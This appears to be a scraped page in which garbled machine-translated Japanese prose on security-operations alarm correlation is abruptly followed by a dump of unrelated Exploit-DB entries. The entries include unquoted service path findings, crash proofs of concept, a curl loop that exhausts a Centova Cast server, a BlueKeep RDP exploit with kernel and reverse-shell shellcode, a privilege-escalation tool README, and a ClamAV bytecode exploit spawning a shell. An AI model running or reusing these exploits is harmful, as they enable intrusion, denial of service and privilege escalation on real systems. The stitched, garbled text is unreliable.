セキュリティ運用の観点から。まず第一に、私たちはついに、アラームを1つずつ処理するという退屈で反復的な手動労働を取り除きました。攻撃チェーンの観点から見ると、10,000以上のアラームは、4つのターゲット、合計3x4=12の攻撃チェーン情報を攻撃する3つの攻撃源である場合があります。 4人の被害者を扱うことで、損失の決定、停止損失、ビジネスへの返信、修正および修理計画の指定と促進を完了することができます。神の観点から物事を見て、イントラネットセキュリティ作戦の基本的な問題を解決します。第二に、アラームなしで攻撃が起こっていないのですか?答えは明らかにノーですが、攻撃チェーン全体のアラームがトリガーされていないかどうか?そのような偉大なマスターは除外されていませんが、それは間違いなくまれです。したがって、アラームがある限り、攻撃チェーン全体を把握することができます。これは、過小報告によって引き起こされるリスクの問題をある程度軽減することもあります。繰り返しますが、ログ、トラフィック、アラームを最終的に1つのプラットフォームに統合でき、データ統合と分析の手動で完了する必要があるデータ統合と分析の恥ずかしさを回避できます。
リスク傾向の評価
元の状況には、新しい攻撃方法と新しいリスクの高い脆弱性があります。組織の内部リスクを評価する方法、マシンの表示、影響を受けるコンポーネントの確認、マシンの数と影響を受けるビジネスの数を手動で評価します。これは、この問題を完全に解決した以前のデータの系統的レビューと統計のおかげで、これですべて自動的に実行できます。
全体的なアーキテクチャ
#Exploit Title: BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2019-11-18
#Vendor Homepage : https://www.filehorse.com/
#Link Software : https://www.filehorse.com/download-bartvpn/
#Tested on OS: Windows 7
#Analyze PoC :
==============
C:\Users\ZwX>sc qc BartVPNService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: BartVPNService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\ZwX\AppData\Local\BartVPN\BartVPNService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BartVPNService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-18
# Vendor Homepage: https://www.rockwellautomation.com/en_NA/overview.page
# Software Link : https://www.rockwellautomation.com/en_NA/products/factorytalk/overview.page?pagetitle=Studio-5000-Logix-Designer&docid=924d2f2060bf9d409286937296a18142
# Rockwell Automation Technologies
# Tested Version: 30.01.00
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Rockwell" |findstr /i /v """
FactoryTalk Activation Service FactoryTalk Activation Service C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe Auto
# Service info:
C:\>sc qc "FactoryTalk Activation Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FactoryTalk Activation Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : FactoryTalk Activation Service
DEPENDENCIES : winmgmt
: wmiapsrv
: +NetworkProvider
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
#Exploit Title: XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service
#Exploit Author : ZwX
#Exploit Date: 2019-11-18
#Vendor Homepage : https://www.xmedia-recode.de/
#Link Software : https://www.xmedia-recode.de/download.php
#Tested on OS: Windows 7
#Social: twitter.com/ZwX2a
#contact: msk4@live.fr
'''
Proof of Concept (PoC):
=======================
1.Download and install XMedia Recode
2.Run the python operating script that will create a file (poc.m3u)
3.Run the software "File -> Open File -> Add the file (.m3u) "
4.XMedia Recode Crashed
'''
#!/usr/bin/python
http = "http://"
buffer = "\x41" * 500
poc = http + buffer
file = open("poc.m3u,"w")
file.write(poc)
file.close()
print "POC Created by ZwX"
# Exploit Title: scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-18
# Vendor Homepage: https://apps.apple.com/ca/app/scadaapp/id1206266634
# Software Link: App Store for iOS devices
# Tested Version: 1.1.4.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 13.2
# Steps to Produce the Crash:
# 1.- Run python code: scadaApp_for_iOS_1.1.4.0.py
# 2.- Copy content to clipboard
# 3.- Open "scadaApp for iOS"
# 4.- Let's go
# 5.- Username > "l4m5"
# 6.- Password > "l4m5"
# 7.- Paste ClipBoard on "Servername"
# 8.- Login
# 9.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 257
print (buffer)
# Exploit Title: Centova Cast 3.2.12 - Denial of Service (PoC)
# Date: 2019-11-18
# Exploit Author: DroidU
# Vendor Homepage: https://centova.com
# Affected Version: <=v3.2.12
# Tested on: Debian 9, CentOS 7
# ===============================================
# The Centova Cast becomes out of control and causes 100% CPU load on all cores.
#!/bin/bash
if [ "$3" = "" ]
then
echo "Usage: $0 centovacast_url reseller/admin password"
exit
fi
url=$1
reseller=$2
pass=$3
dwn() {
echo -n .
curl -s -k --connect-timeout 5 -m 5 "$url/api.php?xm=system.database&f=json&a\[username\]=&a\[password\]=$reseller|$pass&a\[action\]=export&a\[filename\]=/dev/zero" &
}
for i in {0..32}
do
dwn /dev/zero
sleep .1
done
echo "
Done!"
# EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47683.zip
import rdp
import socket
import binascii
import time
def pool_spray(s, crypter, payload):
times = 10000
count = 0
while count < times:
count += 1
#print('time through %d' % count)
try:
s.sendall(rdp.write_virtual_channel(crypter, 7, 1005, payload))
except ConnectionResetError:
print('ConnectionResetError pool_spray Aborting')
quit()
def main():
# change to your target
host = '192.168.0.46'
port = 3389
times = 4000
count = 0
target = (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
crypter = rdp.connect(s)
# this address was choosen for the pool spray. it could be be
# modified for potentially higher success rates.
# in my testing against the win7 VM it is around 80% success
# 0x874ff028
shellcode_address = b'\x28\xf0\x4f\x87'
# replace buf with your shellcode
buf = b""
buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
buf += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x00\x22\x68"
buf += b"\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
buf += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
buf += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
buf += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
buf += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
buf += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
buf += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
buf += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
buf += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
buf += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
# bluekeep_kshellcode_x86.asm
# ring 0 to ring 3 shellcode
shellcode = b""
shellcode += b"\x60\xe8\x00\x00\x00\x00\x5b\xe8\x26\x00\x00\x00"
shellcode += b"\xb9\x76\x01\x00\x00\x0f\x32\x8d\x7b\x3c\x39\xf8"
shellcode += b"\x74\x11\x39\x45\x00\x74\x06\x89\x45\x00\x89\x55"
shellcode += b"\x08\x89\xf8\x31\xd2\x0f\x30\x61\xf4\xeb\xfd\xc2"
shellcode += b"\x24\x00\x8d\xab\x00\x10\x00\x00\xc1\xed\x0c\xc1"
shellcode += b"\xe5\x0c\x83\xed\x50\xc3\xb9\x23\x00\x00\x00\x6a"
shellcode += b"\x30\x0f\xa1\x8e\xd9\x8e\xc1\x64\x8b\x0d\x40\x00"
shellcode += b"\x00\x00\x8b\x61\x04\x51\x9c\x60\xe8\x00\x00\x00"
shellcode += b"\x00\x5b\xe8\xcb\xff\xff\xff\x8b\x45\x00\x83\xc0"
shellcode += b"\x17\x89\x44\x24\x24\x31\xc0\x99\x42\xf0\x0f\xb0"
shellcode += b"\x55\x08\x75\x12\xb9\x76\x01\x00\x00\x99\x8b\x45"
shellcode += b"\x00\x0f\x30\xfb\xe8\x04\x00\x00\x00\xfa\x61\x9d"
shellcode += b"\xc3\x8b\x45\x00\xc1\xe8\x0c\xc1\xe0\x0c\x2d\x00"
shellcode += b"\x10\x00\x00\x66\x81\x38\x4d\x5a\x75\xf4\x89\x45"
shellcode += b"\x04\xb8\x78\x7c\xf4\xdb\xe8\xd3\x00\x00\x00\x97"
shellcode += b"\xb8\x3f\x5f\x64\x77\x57\xe8\xc7\x00\x00\x00\x29"
shellcode += b"\xf8\x89\xc1\x3d\x70\x01\x00\x00\x75\x03\x83\xc0"
shellcode += b"\x08\x8d\x58\x1c\x8d\x34\x1f\x64\xa1\x24\x01\x00"
shellcode += b"\x00\x8b\x36\x89\xf2\x29\xc2\x81\xfa\x00\x04\x00"
shellcode += b"\x00\x77\xf2\x52\xb8\xe1\x14\x01\x17\xe8\x9b\x00"
shellcode += b"\x00\x00\x8b\x40\x0a\x8d\x50\x04\x8d\x34\x0f\xe8"
shellcode += b"\xcb\x00\x00\x00\x3d\x5a\x6a\xfa\xc1\x74\x0e\x3d"
shellcode += b"\xd8\x83\xe0\x3e\x74\x07\x8b\x3c\x17\x29\xd7\xeb"
shellcode += b"\xe3\x89\x7d\x0c\x8d\x1c\x1f\x8d\x75\x10\x5f\x8b"
shellcode += b"\x5b\x04\xb8\x3e\x4c\xf8\xce\xe8\x61\x00\x00\x00"
shellcode += b"\x8b\x40\x0a\x3c\xa0\x77\x02\x2c\x08\x29\xf8\x83"
shellcode += b"\x7c\x03\xfc\x00\x74\xe1\x31\xc0\x55\x6a\x01\x55"
shellcode += b"\x50\xe8\x00\x00\x00\x00\x81\x04\x24\x92\x00\x00"
shellcode += b"\x00\x50\x53\x29\x3c\x24\x56\xb8\xc4\x5c\x19\x6d"
shellcode += b"\xe8\x25\x00\x00\x00\x31\xc0\x50\x50\x50\x56\xb8"
shellcode += b"\x34\x46\xcc\xaf\xe8\x15\x00\x00\x00\x85\xc0\x74"
shellcode += b"\xaa\x8b\x45\x1c\x80\x78\x0e\x01\x74\x07\x89\x00"
shellcode += b"\x89\x40\x04\xeb\x9a\xc3\xe8\x02\x00\x00\x00\xff"
shellcode += b"\xe0\x60\x8b\x6d\x04\x97\x8b\x45\x3c\x8b\x54\x05"
shellcode += b"\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\x49"
shellcode += b"\x8b\x34\x8b\x01\xee\xe8\x1d\x00\x00\x00\x39\xf8"
shellcode += b"\x75\xf1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b"
shellcode += b"\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24"
shellcode += b"\x1c\x61\xc3\x52\x31\xc0\x99\xac\xc1\xca\x0d\x01"
shellcode += b"\xc2\x85\xc0\x75\xf6\x92\x5a\xc3\x58\x89\x44\x24"
shellcode += b"\x10\x58\x59\x58\x5a\x60\x52\x51\x8b\x28\x31\xc0"
shellcode += b"\x64\xa2\x24\x00\x00\x00\x99\xb0\x40\x50\xc1\xe0"
shellcode += b"\x06\x50\x54\x52\x89\x11\x51\x4a\x52\xb8\xea\x99"
shellcode += b"\x6e\x57\xe8\x7b\xff\xff\xff\x85\xc0\x75\x4f\x58"
shellcode += b"\x8b\x38\xe8\x00\x00\x00\x00\x5e\x83\xc6\x55\xb9"
shellcode += b"\x00\x04\x00\x00\xf3\xa4\x8b\x45\x0c\x50\xb8\x48"
shellcode += b"\xb8\x18\xb8\xe8\x56\xff\xff\xff\x8b\x40\x0c\x8b"
shellcode += b"\x40\x14\x8b\x00\x66\x83\x78\x24\x18\x75\xf7\x8b"
shellcode += b"\x50\x28\x81\x7a\x0c\x33\x00\x32\x00\x75\xeb\x8b"
shellcode += b"\x58\x10\x89\x5d\x04\xb8\x5e\x51\x5e\x83\xe8\x32"
shellcode += b"\xff\xff\xff\x59\x89\x01\x31\xc0\x88\x45\x08\x40"
shellcode += b"\x64\xa2\x24\x00\x00\x00\x61\xc3\x5a\x58\x58\x59"
shellcode += b"\x51\x51\x51\xe8\x00\x00\x00\x00\x83\x04\x24\x09"
shellcode += b"\x51\x51\x52\xff\xe0\x31\xc0"
shellcode += buf
print('shellcode len: %d' % len(shellcode))
payload_size = 1600
payload = b'\x2c\xf0\x4f\x87' + shellcode
payload = payload + b'\x5a' * (payload_size - len(payload))
print('[+] spraying pool')
pool_spray(s, crypter, payload)
fake_obj_size = 168
call_offset = 108
fake_obj = b'\x00'*call_offset + shellcode_address
fake_obj = fake_obj + b'\x00' * (fake_obj_size - len(fake_obj))
time.sleep(.5)
print('[+] sending free')
s.sendall(rdp.free_32(crypter))
time.sleep(.15)
print('[+] allocating fake objects')
while count < times:
count += 1
#print('time through %d' % count)
try:
s.sendall(rdp.write_virtual_channel(crypter, 7, 1005, fake_obj))
except ConnectionResetError:
s.close()
s.close()
if __name__== "__main__":
main()
## EDB Note
Download:
- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47684-1.exe
- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47684-2.zip
# COMahawk
**Privilege Escalation: Weaponizing CVE-2019-1405 and CVE-2019-1322**
## Video Demo
https://vimeo.com/373051209
## Usage
### Compile or Download from Release (https://github.com/apt69/COMahawk/releases)
1. Run COMahawk.exe
2. ???
3. Hopefully profit
or
1. COMahawk.exe "custom command to run" (ie. COMahawk.exe "net user /add test123 lol123 &")
2. ???
3. Hopefully profit
## Concerns
**MSDN mentioned that only 1803 to 1903 is vulnerable to CVE-2019-1322. If it doesn't work, maybe it was patched.**
However, it is confirmed that my 1903 does indeed have this bug so maybe it was introduced somewhere inbetween. YMMV.
Also, since you are executing from a service - you most likely cannot spawn any Window hence all command will be "GUI-less". Maybe different session? Idk, it is too late and I am tired haha.
## Credits:
https://twitter.com/leoloobeek for helping me even when he doesn't even have a laptop
https://twitter.com/TomahawkApt69 for being the mental support and motivation
and most of all:
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
for discovering and publishing the write up. 100% of the credit goes here.
#!/usr/bin/python
'''
Finished : 22/07/2019
Pu8lished : 31/10/2019
Versi0n : Current (<= 0.102.0)
Result : Just for fun.
"Because of my inability to change the world."
In 2002, ClamAV got introducted as a solution for malwares on UNIX-based systems, built on
a signature-based detection approach, and still undergoes active-development. by that time,
LibClamAV only held 2 binaries, and expanded to 5 at present.
ClamBC were exceptionally more complex and served as a testing tool for bytecodes, majorly
validating and interpreting the code therein, and the information provided didn't indicate
nor explain the presence of its internal mechanisms.
The availability of the source-code and the lack of documentation led to the establishment
of this paper, it was certainly not an attempt to escalate privileges, but rather a sought
-after experience, and source of entertainment that grants the thrill of a challenge.
Due to the considerable amount of time spent in the analysis, the dissection of the engine
was imminent, whilst significantly broadening our perception on its internal structures.
The trial and error process produced valuable information, crashes illuminated latent bugs,
effectively increasing the attack surface, and magnifying the possibility for exploitation.
> ./exploit.py
> clambc --debug exploit
[SNIP]
$
'''
names = ['test1',
'read',
'write',
'seek',
'setvirusname',
'debug_print_str',
'debug_print_uint',
'disasm_x86',
'trace_directory',
'trace_scope',
'trace_source',
'trace_op',
'trace_value',
'trace_ptr',
'pe_rawaddr',
'file_find',
'file_byteat',
'malloc',
'test2',
'get_pe_section',
'fill_buffer',
'extract_new',
'read_number',
'hashset_new',
'hashset_add',
'hashset_remove',
'hashset_contains',
'hashset_done',
'hashset_empty',
'buffer_pipe_new',
'buffer_pipe_new_fromfile',
'buffer_pipe_read_avail',
'buffer_pipe_read_get',
'buffer_pipe_read_stopped',
'buffer_pipe_write_avail',
'buffer_pipe_write_get',
'buffer_pipe_write_stopped',
'buffer_pipe_done',
'inflate_init',
'inflate_process',
'inflate_done',
'bytecode_rt_error',
'jsnorm_init',
'jsnorm_process',
'jsnorm_done',
'ilog2',
'ipow',
'iexp',
'isin',
'icos',
'memstr',
'hex2ui',
'atoi',
'debug_print_str_start',
'debug_print_str_nonl',
'entropy_buffer',
'map_new',
'map_addkey',
'map_setvalue',
'map_remove',
'map_find',
'map_getvaluesize',
'map_getvalue',
'map_done',
'file_find_limit',
'engine_functionality_level',
'engine_dconf_level',
'engine_scan_options',
'engine_db_options',
'extract_set_container',
'input_switch',
'get_environment',
'disable_bytecode_if',
'disable_jit_if',
'version_compare',
'check_platform',
'pdf_get_obj_num',
'pdf_get_flags',
'pdf_set_flags',
'pdf_lookupobj',
'pdf_getobjsize',
'pdf_getobj',
'pdf_getobjid',
'pdf_getobjflags',
'pdf_setobjflags',
'pdf_get_offset',
'pdf_get_phase',
'pdf_get_dumpedobjid',
'matchicon',
'running_on_jit',
'get_file_reliability',
'json_is_active',
'json_get_object',
'json_get_type',
'json_get_array_length',
'json_get_array_idx',
'json_get_string_length',
'json_get_string',
'json_get_boolean',
'json_get_int']
o = names.index('buffer_pipe_new') + 1
k = names.index('buffer_pipe_write_get') + 1
l = names.index('debug_print_str') + 1
m = names.index('malloc') + 1
c = 0
for name in names:
names[c] = name.encode('hex')
c += 1
def cc(n):
v = chr(n + 0x60)
return v
def cs(s):
t = ''
for i in xrange(0, len(s), 2):
u = int(s[i], 16)
l = int(s[i + 1], 16)
for i in [u, l]:
if((i >= 0 and i <= 0xf)):
continue
print 'Invalid string.'
exit(0)
t += cc(l) + cc(u)
return t
def wn(n, fixed=0, size=0):
if n is 0:
return cc(0)
t = ''
c = hex(n)[2:]
l = len(c)
if (l % 2) is 1:
c = "0" + c
r = c[::-1]
if(l <= 0x10):
if not fixed:
t = cc(l)
i = 0
while i < l:
t += cc(int(r[i], 16))
i += 1
else:
print 'Invalid number.'
exit(0)
if size != 0:
t = t.ljust(size, '`')
return t
def ws(s):
t = '|'
e = s[-2:]
if(e != '00'):
print '[+] Adding null-byte at the end of the string..'
s += '00'
l = (len(s) / 2)
if (len(s) % 2) is 1:
print 'Invalid string length.'
exit(0)
t += wn(l)
t += cs(s)
return t
def wt(t):
if t < (num_types + 0x45):
v = wn(t)
return v
else:
print 'Invalid type.'
exit(0)
def initialize_header(minfunc=0, maxfunc=0, num_func=0, linelength=4096):
global flimit, num_types
if maxfunc is 0:
maxfunc = flimit
if(minfunc > flimit or maxfunc < flimit):
print 'Invalid minfunc and/or maxfunc.'
exit(0)
header = "ClamBC"
header += wn(0x07) # formatlevel(6, 7)
header += wn(0x88888888) # timestamp
header += ws("416c69656e") # sigmaker
header += wn(0x00) # targetExclude
header += wn(0x00) # kind
header += wn(minfunc) # minfunc
header += wn(maxfunc) # maxfunc
header += wn(0x00) # maxresource
header += ws("00") # compiler
header += wn(num_types + 5) # num_types
header += wn(num_func) # num_func
header += wn(0x53e5493e9f3d1c30) # magic1
header += wn(0x2a, 1) # magic2
header += ':'
header += str(linelength)
header += chr(0x0a)*2
return header
def prepare_types(contained, type=1, nume=1):
global num_types
types = "T"
types += wn(0x45, 1) # start_tid(69)
for i in range(0, num_types):
types += wn(type[i], 1) # kind
if type[i] in [1, 2, 3]:
# Function, PackedStruct, Struct
types += wn(nume[i]) # numElements
for j in range(0, nume[i]):
types += wt(contained[i][j]) # containedTypes[j]
else:
# Array, Pointer
if type[i] != 5:
types += wn(nume[i]) # numElements
types += wt(contained[i][0]) # containedTypes[0]
types += chr(0x0a)
return types
def prepare_apis(calls=1):
global maxapi, names, ids, tids
if(calls > max_api):
print 'Invalid number of calls.'
exit(0)
apis = 'E'
apis += wn(max_api) # maxapi
apis += wn(calls) # calls(<= maxapi)
for i in range(0, calls):
apis += wn(ids[i]) # id
apis += wn(tids[i]) # tid
apis += ws(names[ids[i] - 1]) # name
apis += chr(0x0a)
return apis
def prepare_globals(numglobals=1):
global max_globals, type, gval
globals = 'G'
globals += wn(max_globals) # maxglobals
globals += wn(numglobals) # numglobals
for i in range(0, numglobals):
globals += wt(type[i]) # type
for j in gval[i]: # subcomponents
n = wn(j)
globals += chr(ord(n[0]) - 0x20)
globals += n[1:]
globals += cc(0)
globals += chr(0x0a)
return globals
def prepare_function_header(numi, numbb, numa=1, numl=0):
global allo
if numa > 0xf:
print 'Invalid number of arguments.'
exit(0)
fheader = 'A'
fheader += wn(numa, 1) # numArgs
fheader += wt(0x20) # returnType
fheader += 'L'
fheader += wn(numl) # numLocals
for i in range(0, numa + numl):
fheader += wn(type[i]) # types
fheader += wn(allo[i], 1) # | 0x8000
fheader += 'F'
fheader += wn(numi) # numInsts
fheader += wn(numbb) # numBB
fheader += chr(0x0a)
return fheader
flimit = 93
max_api = 100
max_globals = 32773
num_types = 6
# Header parsing
w = initialize_header(num_func=0x1)
# Types parsing
cont = [[0x8], [0x45], [0x20, 0x20], [0x41, 0x20, 0x20], [0x20, 0x41, 0x20], [0x41, 0x20]]
type = [0x4, 0x5, 0x1, 0x1, 0x1, 0x1]
num = [0x8, 0x1, 0x2, 0x3, 0x3, 0x2]
w += prepare_types(cont, type, num)
# API parsing
ids = [o, k, l, m]
tids = [71, 72, 73, 74]
w += prepare_apis(0x4)
'''
# crash @ id=0
'''
# Globals parsing
type = [0x45]
gval = [[0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41]]
w += prepare_globals(0x1)
# Function header parsing
type = [0x45, 0x41, 0x40, 0x40, 0x40, 0x40, 0x20]
allo = [ 1, 0, 0, 0, 0, 0, 0]
w += prepare_function_header(35, 0x1, 0x0, 0x7)
# BB parsing
p = 'B'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x0)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += '@d'
# STORE (0x0068732f6e69622f(L=8) -> ([Var #1]))
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += 'Nobbfifnfobcghfh'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x360)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'C`fcd'
# LOAD Var #2 = ([Var #1])
p += wn(0x40)
p += wn(0x2)
p += wn(0x27, 1)
p += wn(0x1)
# SUB Var #2 -= 0xd260
p += wn(0x40)
p += wn(0x2)
p += wn(0x2, 1, 2)
p += wn(0x2)
p += 'D`fbmd'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x10)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`ad'
# LOAD Var #3 = ([Var #1])
p += wn(0x40)
p += wn(0x3)
p += wn(0x27, 1)
p += wn(0x1)
# SUB Var #3 -= 0x10
p += wn(0x40)
p += wn(0x3)
p += wn(0x2, 1, 2)
p += wn(0x3)
p += 'B`ad'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x30)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`cd'
# LOAD Var #4 = ([Var #1])
p += wn(0x40)
p += wn(0x4)
p += wn(0x27, 1)
p += wn(0x1)
# SUB Var #4 -= 0x190
p += wn(0x40)
p += wn(0x4)
p += wn(0x2, 1, 2)
p += wn(0x4)
p += 'C`iad'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x38)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhcd'
# STORE (Var #3 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x3)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x48)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhdd'
# ADD Var #3 += 0x3
p += wn(0x40)
p += wn(0x3)
p += wn(0x2, 1, 2)
p += wn(0x3)
p += 'Acd'
# STORE (Var #3 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x3)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x28)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhbd'
# ADD Var #5 += Var #2 + 0xcbda
p += wn(0x40)
p += wn(0x5)
p += wn(0x1, 1, 2)
p += wn(0x2)
p += 'Djmkld'
# STORE (Var #5 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x5)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x20)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`bd'
# STORE (Var #4 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x4)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x18)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhad'
# ADD Var #5 += Var #2 + 0x99dc
p += wn(0x40)
p += wn(0x5)
p += wn(0x1, 1, 2)
p += wn(0x2)
p += 'Dlmiid'
# STORE (Var #5 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x5)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x10)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`ad'
# STORE (0x3b -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += 'Bkcd'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x30)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`cd'
# STORE (0x0 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += '@d'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x40)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`dd'
# STORE (0x0 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += '@d'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x8)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Ahd'
# ADD Var #2 += 0x6d68
p += wn(0x40)
p += wn(0x2)
p += wn(0x1, 1, 2)
p += wn(0x2)
p += 'Dhfmfd'
# STORE (Var #2 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x2)
p += wn(0x1)
'''
0x99dc : pop rdi ; ret
0xcbda : pop rsi ; ret
0x6d68 : pop rax ; ret
Var #2 = text_base
Var #3 = syscall (+3: pop rdx; ret)
Var #4 = "/bin/sh\x00"
pop rax; ret; o 0x8
59 o 0x10
pop rdi; ret; o 0x18
sh; address o 0x20
pop rsi; ret; o 0x28
0x0 o 0x30
pop rdx; ret; o 0x38
0x0 o 0x40
syscall o 0x48
'''
# COPY Var #6 = (0x5a90050f(o`e``ije))
p += wn(0x20)
p += wn(0x0)
p += wn(0x22, 1)
p += 'Ho`e``ijeh'
p += wn(0x6)
